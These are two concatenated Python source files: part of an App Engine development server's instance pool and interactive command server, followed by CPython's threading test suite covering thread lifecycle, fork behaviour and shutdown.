self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
_THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._server_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the the server, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandServer(Server):
"""A Server that can evaluate user commands.
This server manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
server_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files):
"""Initializer for InteractiveCommandServer.
Args:
server_configuration: An application_configuration.ServerConfiguration
instance storing the configuration data for this server.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
interactive command e.g. "localhost".
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Server and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
"""
super(InteractiveCommandServer, self).__init__(
server_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Server is listening on.
The InteractiveCommandServer does not actually listen on this port but it is
used when constructing the "SERVER_PORT" in the WSGI-environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandServer."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingServer.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
# If the instance is restarted while handling a request then the
# exception raises is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
return ['The command timed-out while waiting for another one to complete']
def restart(self):
"""Restarts the the server."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the server.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
raise InteractiveCommandError('Unexpected command failure: ', str(e))
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
|
test_threading.py | """
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
with self.assertWarnsRegex(DeprecationWarning, 'use is_alive()'):
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
@requires_type_collecting
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
